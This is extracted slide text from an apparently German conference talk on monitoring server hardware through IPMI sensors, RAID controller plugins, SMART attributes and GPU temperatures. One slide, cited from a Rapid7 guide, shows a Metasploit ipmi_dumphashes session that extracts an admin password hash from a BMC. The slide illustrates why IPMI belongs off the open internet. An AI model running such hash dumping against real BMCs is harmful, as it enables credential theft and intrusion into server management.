Server Hardware ist vielfältig - und damit können auch mögliche Probleme auftreten. Für das Monitoring der Serverkomponenten gibt es unterschiedliche Schnittstellen. Die Palette reicht hier von Netzwerkprotokollen wie IPMI und SNMP bis hin zu Checks, die lokal am jeweiligen Server ausgeführt werden müssen (z.B. für RAID-Controller, SMART-Attribute oder GPU-Karten).
Im Vortrag erfahren Sie welche Checks Sie am besten für bestimmte Hardware Komponenten einsetzen und damit zuverlässig zeitnah informiert werden, sobald sich Probleme abzeichnen.
14. FRU Temp.
sensor
…
Chassis board
14
Aufbau
Motherboard
private mgmt. busses
Processor
board
Memory
board
Zugriff mit
Benutzername
& Passwort
Baseboard
Management
Controller
(BMC)
System bus
NVS Storage
SDR
SEL
FRU
Chassis
mgmt.
(Satellite
Controller)
Sensors & Controls
Fan sensor
Temp. sensor
Power control
Reset control
…
FRU
Temp. s.
FRU
IPMB
LAN
interface
Serial
Port
Sharing
M/B
Serial
Controller
BMC
Serial
Controller
Serial/Modem
interface
Serial
Connector
LAN
Connector
PCI mgmt. bus
Network
(LAN)
Controller
Remote Mmgt. Card
(KVM over IP, ...)
Auxillary
IPMB Connector
ICMB
ICMB
bridge
System
interface
Redundant Power
board
FRU
Zugriff mit
root Rechten
15. 15
IPMI Sensor Klassen
Discrete (True/False) Threshold (Schwellwerte)
Mehrere Zustände möglich:
● bis zu 15 Status möglich
● jeder Status = 1 Bit
● mehrere aktive Statusbits möglich
Zustand abhängig von:
● Vergleich analoger Messert mit dem
Schwellwerten (Thresholds)
Liefert:
● allgemeine Zustände
● Sensor-spezifische Zustände
Liefert:
● analogen Messwert
● diskreten Status
Ähnliche Klasse OEM
● Bedeutung der Zustände werden
vom OEM definiert
16. 16
IPMI Sensor Klassen
Discrete Threshold
[root@test ~]# ipmitool sdr get "PS2 Status"
Sensor ID : PS2 Status (0x71)
Entity ID : 10.2 (Power Supply)
Sensor Type (Discrete): Power Supply
States Asserted : Power Supply
[Presence detected]
[Power Supply AC
lost]
Assertion Events : Power Supply
[Presence detected]
[Power Supply AC
lost]
Assertions Enabled : Power Supply
[Presence detected]
[Failure detected]
[Predictive failure]
[Power Supply AC
lost]
[...]
Deassertions Enabled : Power Supply
[...]
[root@test ~]# ipmitool sdr get "Fan 1"
Sensor ID : Fan 1 (0x50)
Entity ID : 29.1 (Fan
Device)
Sensor Type (Analog) : Fan
Sensor Reading : 5719 (+/0)
RPM
Status : ok
Nominal Reading : 6708.000
Normal Minimum : 2451.000
Normal Maximum : 10965.000
Lower critical : 1720.000
Lower noncritical
: 1978.000
Positive Hysteresis : 86.000
Negative Hysteresis : 86.000
Minimum sensor range : Unspecified
Maximum sensor range : Unspecified
Event Message Control : Perthreshold
Readable Thresholds : lcr lnc
Settable Thresholds : lcr lnc
Threshold Read Mask : lcr lnc
Assertion Events :
Assertions Enabled : lnclcrDeassertions
Enabled : lnclcr
17. $ sudo ipmisensors
outputsensorstate
interpretoemdata
Password:
ID | Name | Type | State | Reading | Units | Event
4 | System Temp | Temperature | Nominal | 27.00 | C | 'OK'
71 | Peripheral Temp | Temperature | Nominal | 35.00 | C | 'OK'
138 | CPU Temp | OEM Reserved | Nominal | N/A | N/A | 'Low'
205 | FAN 1 | Fan | Nominal | 1800.00 | RPM | 'OK'
… 942 | VBAT | Voltage | Nominal | 3.15 | V | 'OK'
1009 | VSB | Voltage | Nominal | 3.34 | V | 'OK'
1076 | AVCC | Voltage | Nominal | 3.38 | V | 'OK'
1143 | Chassis Intru | Physical Security | Critical | N/A | N/A | 'Gen...'
17
IPMI Sensoren OK
Critical
20. 20
IPMI Plugin
#!/usr/bin/perl
# check_ipmi_sensor: Nagios/Icinga plugin to check IPMI sensors
##
Copyright (C) 20092014
ThomasKrenn.
AG,
# additional contributors see changelog.txt
##
This program is free software; you can redistribute it and/or modify it under
[…]
Version 3.5 20141031
* Fix LAN Driver if called on localhost
Version 3.4 20140929
* Fix implicit array warning with split
* Add option to disable LAN protocol version 2.0
Version 3.3 20140606
* Print a warning if ipmisensors
only returned a single output row
* Ignore sudo errors and warnings in IPMI command output
(Thanks to Robert Heinzmann for contributing)
* Use LAN protocol version 2.0 per default
* Print empty output error only if return code was 0
* Exit the plugin with return code 3 if fru command fails
* Added an include list option to only include specific sensors
Version 3.2 20131028
* Added FRU serial number to output
29. 29
IPMI Firmware by ATEN / AMI
_ Mainboard-Hersteller
passen Firmware an
_ OS = Embedded Linux
_ IPMI Firmware Teile
Closed-Source
30. Wir empfehlen administrative Zugänge
wie IPMI- aber auch etwa SSH-Dienste
nicht offen im Internet zu betreiben,
30
sondern mittels Firewall/VPN den
Zugriff auf solche Dienste
ausschließlich berechtigten Personen
zu ermöglichen.
35. 35
#2 – User Management
sjfaiklaz afjhuijoh
Administrator
User
36. In short, the authentication process for IPMI 2.0 mandates
that the server send a salted SHA1 or MD5 hash of the
requested user's password to the client, prior to the client
authenticating.
36
#2 – User Management
A Penetration Tester's Guide to IPMI and BMCs (rapid7.com)
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf auxiliary(ipmi_dumphashes) > set RHOSTS 10.1.102.141
RHOSTS => 10.1.102.141
msf auxiliary(ipmi_dumphashes) > set THREADS 128
THREADS => 128
msf auxiliary(ipmi_dumphashes) > run
[+] 10.1.102.141:623 - IPMI - Hash found:
admin:14667523250000004ec525d3852f4fa73c93b674788217fe00000000000000
00000000000000000000000000000000000000000000000000140561646d696e:2c7
6e372d89ac7cd4e3bfecb423962f708d0741c
55. 55
root@debiantest:~#
storcli64
Storage Command Line Tool Ver 1.13.06 Sep 03, 2014
(c)Copyright 2014, LSI Corporation, All Rights Reserved.
help lists
all the commands with their usage. E.g. storcli help
<command> help gives
details about a particular command. E.g. storcli add help
List of commands:
Commands Description
add
Adds/creates a new element to controller like VD,Spare..etc
delete Deletes an element like VD,Spare
show Displays information about an element
set Set a particular value to a property
get Get a particular value to a property
compare Compares particular value to a property
start Start background operation
stop Stop background operation
pause Pause background operation
resume Resume background operation
download Downloads file to given device
expand expands size of given drive
insert inserts new drive for missing
transform downgrades the controller
/cx Controller specific commands
/ex Enclosure specific commands
/sx Slot/PD specific commands
/vx Virtual drive specific commands
/dx Disk group specific commands
/fall Foreign configuration specific commands
/px Phy specific commands
/[bbu|cv] Battery Backup Unit, Cachevault commands
56. $ /usr/lib/nagios/plugins/check_lsi_raid vv
Warning (LD Warn) [c0/v0_Consist = Warning (No)]|
CV_Temperature=22;70;85 ROC_Temperature=57;80;90
c0/e252/s0_Drive_Temperature=21;40;45
c0/e252/s1_Drive_Temperature=21;40;45
Used storcli commands:
/
usr/bin/sudo /usr/sbin/storcli64 /c0 /cv show status
/
usr/bin/sudo /usr/sbin/storcli64 adpallinfo a0
/
usr/bin/sudo /usr/sbin/storcli64 /c0/vall show all
/
usr/bin/sudo /usr/sbin/storcli64 /c0/vall show init
/
usr/bin/sudo /usr/sbin/storcli64 /c0/eall/sall show all
/
usr/bin/sudo /usr/sbin/storcli64 /c0/eall/sall show initialization
/
usr/bin/sudo /usr/sbin/storcli64 /c0/eall/sall show rebuild
Warning sensors:
c0/
v0_Consist (No)
56
check_lsi_raid
57. Warum adpallinfo a0?
„storcli /0 show all …
blocks the whole raid card
i/o for … upto ~4 seconds“
57
58. Warum adpallinfo a0?
„storcli /0 show all …
blocks the whole raid card
i/o for … upto ~4 seconds“
58
59. 59
check_lsi_raid
$ /usr/lib/nagios/plugins/check_lsi_raid h
check_lsi_raid: Nagios/Icinga plugin to check LSI Raid Controller status
Pulgin version: 2.0
Copyright (C) 20132014
ThomasKrenn.
AG
Current updates available at
http://git.thomaskrenn.
com/check_lsi_raid.git
This Nagios/Icinga Plugin checks LSI RAID controllers for controller,
physical device, logical device, BBU and CV warnings and errors.
In order for this plugin to work properly you need to add the nagios
user to your sudoers file (or create a new one in /etc/sudoers.d/).
Usage:
[ h
| help
]
Display this help page
[ v
| vv
| vvv
| verbose
]
Sets the verbosity level.
No v
is the normal single line output for Nagios/Icinga, v
is a
more detailed version but still usable in Nagios. vv
is a
multiline output for debugging configuration errors or more
detailed information. vvv
is for plugin problem diagnosis.
For further information please visit:
http://nagiosplug.sourceforge.net/developerguidelines.
html#AEN39
[ V
version
]
Displays the plugin and, if available, the version if StorCLI.
[ C
<num> | controller
<num> ]
Specifies a controller number, defaults to 0.
...
64. 64
$ sudo arcconf
| UCLI | Adaptec by PMC uniform command line interface
| UCLI | Version 1.6 (B21062)
| UCLI | (C) Adaptec by PMC 20032014
| UCLI | All Rights Reserved
ATAPASSWORD | setting password on a physical drive
COPYBACK | toggles controller copy back mode
CREATE | creates a logical device
CONSISTENCYCHECK | toggles the controller background consistency check mode
DELETE | deletes one or more logical devices
ERRORTUNABLE | sets error tunable profiles on the controller
EXPANDERLIST | Lists the Expanders Connected to the Controller
EXPANDERUPGRADE | updates expander firmware
FAILOVER | toggles the controller automatic failover mode
GETCONFIG | prints controller information
GETLOGS | gets controller log information
GETPERFORM | gets the parameters for a performance mode
GETSMARTSTATS | gets the SMART statistics
GETSTATUS | displays the status of running tasks
GETVERSION | prints version information for all controllers
IDENTIFY | blinks LEDS on device(s) connected to a controller
IMAGEUPDATE | update physical device firmware
KEY | installs a Feature Key onto a controller
MODIFY | performs RAID Level Migration or Online Capacity Expansion
PHYERRORLOG | displays PHY error logs for controller or device or an
| expander PHY
PRESERVECACHE | changes the cache preservation settings on the controller
RESCAN | checks for new or removed drives
RESETSTATISTICSCOUNTERS | resets the controller statistics counters
ROMUPDATE | updates controller firmware
SAVESUPPORTARCHIVE | saves the support archive
SETALARM | controls the controller alarm, if present
...
65. check_adaptec_raid Update
$ ./check_adaptec_raid p
/usr/sbin/arcconf
AACRAID CRITICAL (Ctrl #1): [ZMM critical]
$ ./check_adaptec_raid h
ThomasKrenn
Adaptec Raid Controller Nagios/Icinga Plugin Version: 1.0
Copyright (C) 20092013
ThomasKrenn.
AG
Current updates available via git at:
65
http://git.thomaskrenn.
com/check_adaptec_raid.git
This Nagios/Icinga Plugin checks ADAPTEC RAIDControllers
for Controller,
PhysicalDevice
and Logical Device warnings and errors.
In order for this plugin to work properly you need to add the
nagiosuser
to your sudoers file (or create a new one in /etc/sudoers.d/).
This is required as arcconf must be called with sudo permissions.
Usage:
[ C
<Controller number> ] [ LD
<Logical device number> ]
[ PD
<Physical device number> ] [ T
<Warning Temp., Crit. Temp.> ]
[ h
| help
]
Display this help page
[ v
| vv
| vvv
| verbose
]
Sets the verbosity level
no v
single line output for Nagios/Icinga
v
single line with more details
...
geplant
(2015)
66. VMware? → CIM Provider erwartet
_ aktuell:
66
_ „CIM Provider“ für remote arcconf
_ Adaptec MSM in einer VM
_ künftig:
_ „echter“ CIM Provider
76. ja cool, aber was ist mit RAID Controllern?
...
[d|
device
<path to device being checked>]
Specify the device being monitored. If multiple devices should be
checked provide the 'd'
option multiple times.
E.g. 'd
/dev/sda d
/dev/sdb'
For devices behind LSI RAID controllers specify 'megaraid' and then the
device number, e.g. 'd
megaraid6'. Use storcli to find out the
corresponding device numbers.
For devices behind Adaptec RAID controllers specify '/dev/sg<X>' where
<X> is the number for your device. Use e.g. sg_scan to find the device.
You must also use 'O
sat' or 'O
scsi' according to the device
interface. This are extra options only necessary for '/dev/sg<X>'
devices.
76
...
77. ja cool, aber was ist mit RAID Controllern?
$ /usr/lib/nagios/plugins/check_smart_attributes
> d
megaraid6
> dbj
/etc/nagiosplugins/
config/check_smartdb.json
OK (megaraid6) |
megaraid6_Temperature_Internal=26
megaraid6_Media_Wearout_Indicator=100;16;6
megaraid6_Host_Writes_32MiB=70283
megaraid6_Host_Reads_32MiB=1650800
$ /usr/lib/nagios/plugins/check_smart_attributes
> d
megaraid7
> dbj
/etc/nagiosplugins/
config/check_smartdb.json
Warning (megaraid7) [megaraid7_CRC_Error_Count = Warning]|
megaraid7_Temperature_Internal=34
megaraid7_Media_Wearout_Indicator=098;16;6
megaraid7_Host_Writes_32MiB=189904
megaraid7_Host_Reads_32MiB=29658
77
80. NVIDIA: „angezeigte
Lüfterdrehzahl lässt nicht
darauf schließen, ob sich der
Lüfter tatsächlich dreht.“
80
„es ist jene Drehzahl, mit der der Lüfter-Algorithmus versucht den Lüfter zu betreiben.“
wir empfehlen:
„Temperatursensor“
81. 81
Plugins - Future
_ Überwachung von
FW-Versionen
_ RAID Consistency
Checks
_ Temperatur von
10GBit NICs
(siehe Intel X540 FAQs)
83. 83
Relax ...
_ alle Plugins unter git.thomas-krenn.com
_ alle Plugins erfüllen
Plugin Developer Guidelines (-h für Hilfe)
_ „Plugin Entwicklung für Einsteiger“
von Alexander Wirt heute um 14:15h